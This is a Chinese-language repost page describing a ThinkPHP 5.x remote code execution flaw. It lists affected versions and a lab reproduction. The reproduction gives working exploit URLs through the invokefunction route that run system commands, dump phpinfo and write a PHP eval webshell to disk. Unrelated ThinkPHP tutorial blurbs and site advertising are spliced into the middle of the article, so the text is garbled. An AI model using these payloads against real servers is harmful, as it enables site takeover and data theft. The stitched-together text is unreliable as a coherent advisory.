您当前的位置:网站首页>ThinkPHP>thinkphp远程执行命令漏洞 找thinkphp教程就上ki4.cc (>^ω^<),thinkphp

thinkphp远程执行命令漏洞 找thinkphp教程就上ki4.cc (>^ω^<),thinkphp

2020年05月09日 投稿作者: 围观人数:41

ThinkPHP6 事件与多应用 找thinkphp教程就上ki4.cc (>^ω^<)

本篇文章教大家事件与多应用的基本使用,以及利用thinkphp6提供的命令行工具,来自动生成应用和事件。

漏洞概况

ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。

虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。

漏洞危害

攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等问题。

影响版本

5.x < 5.1.31, <= 5.0.23

复现环境

thinkphp5.1 phpstudy集成环境(php5.6n+apache+mysql)

复现过程

1、如图所示首先搭建好环境

thinkphp配置配置多应用多配置的方法 找thinkphp教程就上ki4.cc (>^ω^<)

一般的thinkphp框架一般都是单模块开发的,但有时候我们可能需要进行多模块开发,本文就来为大家介绍一下thinkphp配置多模块、多应用的方法。

2、利用system函数远程命令执行:

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami

3、通过phpinfo函数写出phpinfo()的信息:

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

4、写入shell:

http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

推荐教程:《TP5》

以上就是thinkphp远程执行命令漏洞的详细内容,更多请关注ki4导航其它相关文章!

tp5利用钉钉进行工作流审批 找thinkphp教程就上ki4.cc (>^ω^<)

在各类管理平台的开发过程中,审批是一个没法规避的问题。审批问题,不仅仅要考虑技术实现,还要考虑用户的使用频率,易用性。如果使用软件的公司利用钉钉进行审批考核,管理系统的审批完全可以考虑接入直接钉钉。

标签

版权说明
免责声明:本文文章内容由ki4导航网发布,但不代表本站的观点和立场,具体内容可自行甄别.